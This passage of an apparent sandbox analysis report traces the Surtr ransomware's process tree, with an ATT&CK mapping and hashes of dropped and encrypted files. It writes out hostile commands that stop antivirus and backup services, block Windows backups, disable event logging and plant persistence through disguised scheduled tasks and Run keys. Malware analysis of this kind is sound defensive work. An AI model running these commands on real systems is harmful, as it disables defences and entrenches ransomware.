      PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:5040
  - - C:\Windows\system32\net.exe
      net stop "Antivirus"
      4⤵
      PID:5764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Antivirus"
        5⤵
        
        PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:5748
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:5868
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:6028
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:5980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:5988
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:5776
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:5936
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:5808
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:6084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:3464
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:6092
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:6120
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:5772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:6072
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:6048
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:5984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:3156
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:2036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecManagementService"
        5⤵
        
        PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:5304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:2356
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:1576
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:5288
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:2928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:5516
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:4320
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:3756
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:5356
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:3164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:2856
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:3088
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
        5⤵
        
        PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:2764
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:5252
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:3824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:5156
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:2860
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:2152
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:4352
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:5684
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:5668
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:3604
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:276
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:748
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:284
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:3052
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:4172
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:5428
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1652
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:5372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:5204
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:1284
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:12940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:7504
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:7520
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:7536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:2280
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:8076
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:8116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:9060
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:9072
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:9092

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:3052

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 2844 -ip 2844
1⤵
PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ka.dll.[[email protected]].SURT

Filesize
28KB

MD5
deb00b13302bc336f3e4797e64ecf5c9

SHA1
b8887aeeed40c42fa56e4a8f11cfb5f5be98cb29

SHA256
062def114247f7de26952544ec4cbf9a101c9544d08b841120cfcb75b1597b53

SHA512
8dd0b8410c53875706cbbf673423f90338c5d119cd5d3bf915d7ccb97557c97a7698d802e1c185bfb933510aba6c55e535cb3243a66353191f692fae6fcc0e2f

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.[[email protected]].SURT

Filesize
3.2MB

MD5
8160af04575f98a03eadafade4b00a9a

SHA1
990327d1c618c271995961da7423c2dfba734323

SHA256
ca7472651b2a731b4985b61ca66eb9f2f80fa88774a02591caca2e468bdb85ac

SHA512
53f52e4bc2be5c81bb80d5f6e1a2acbc0f1a4596f32554469476b66899a944d4d8e015113fde08603b241ce10054146731ead8f05b086c7dfffb5bb822f13422

Download Submit
C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ul-oob.xrm-ms.[[email protected]].SURT

Filesize
12KB

MD5
a9adfe4a9bcb816e2f54c9fb066dd8ca

SHA1
8ea1b624e843f9779277335c133553c74617637e

SHA256
f8106bd3765bd800b701c3948fc21eac70106402a74efb3b8a2a842a1257d23d

SHA512
a6eda424597e3000d3621223e4801f5c0119051dec8cc5bfe004a0450060c4dfc160a8360e190ea460b0c2521ca0eb3521736717d3aa2a8eedc2295316da3944

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
88cb03865a86d7e15e851b939093010f

SHA1
727118c1c81896ca27fe98e91cb802cce2fe3f33

SHA256
5dfd7ef65b332f16eec8defae91d5f87de500deeab130e8854ef896022b5fb37

SHA512
ab8863ee3e3387aa9f637d2054378eaaf7f39e5ad9f4dc25edac8fc55ba43fff52a8c098f2289c4c06f6b29d2db42bfef31705a7a6aaba66f44ce1162885d918

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Filesize
1KB

MD5
cf03bc24f060345e0ba24944cda1d611

SHA1
56b230fc4bc7f15999302d44cef25ff9a928470f

SHA256
273ff576fbc0f8e9065fcadc7af4a04094baa07d51ae8ebb43dfc62516badce6

SHA512
a68b9381f1b6630790f351f3309b289cd33397112e4ae0742ada891e250f9abf07f37f142be5d14c9d33aa443672ef159716ed56eef4ee3abb8315ca4d250801

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Filesize
204B

MD5
08ea925d6b3d4c454c431968d4a63a83

SHA1
fcd7865f9e400ebe7f6af73d2dda0a3a22785faa

SHA256
132f9d5176e89ec8adbe772e360ebe453e2ffd6b5e97b818671e2b4b88288b86

SHA512
6f133eb18e35eb1369e5f6606020829ee5ade5cba82a215065beb3d0e713a83797b435f501b1a45fd59663da3e37c0f8739f5a261104b9c40a5f691dd5537ef5

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\SURTR_README.hta

Filesize
8KB

MD5
9587f0498d6ab542878e5ac7dc5739b8

SHA1
08b212408ee4c1b7c9be71cb7ce8daa395963a97

SHA256
f41f05861b9285de9414ec9d9203f6fb394ed3ad08a087ae8de5834bebf1546b

SHA512
19afb4d1f1ffffdcd691978a5e0971352faef126393b37d835367527d0d83dab91a8785d0d45431117ea1e978348784c0e62c819a67567cade98c950dcf004af

Download Submit
C:\Users\Admin\AppData\Local\Temp\SURTR_README.txt

Filesize
621B

MD5
bd76f1a7e5cb0a95624259f341deb47e

SHA1
6779d00d0e3d60ef7e8b46fdc1bb9d8f6cdd59d1

SHA256
212355c47835d11a9df3965a36b34b2f23a9e8aa3f9d5bc7b98e8e28fad7f114

SHA512
951df506c8c2a0498a4e6a9a6c95a659ea66f443e14508b4212274e99ee313256d145fdc8e3b4b7f1bbe1fc9b81f81fca6ea5ae4545cf8b9ebdd9b9dd99da2a7

Download Submit
memory/2844-5-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-51-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-26-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-23-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-7-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-0-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-34-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-35-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-36-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-39-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-41-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-43-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-45-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-47-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-49-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-50-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-52-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-54-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-58-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-57-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-56-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-55-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-53-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-31-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-48-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-46-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-44-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-42-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-40-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-38-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-37-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-24-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-27-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-28-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-29-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-32-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-3-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-121-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-120-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-119-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-118-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-117-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-4-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-116-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-2-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-5565-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-1-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/2844-10562-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download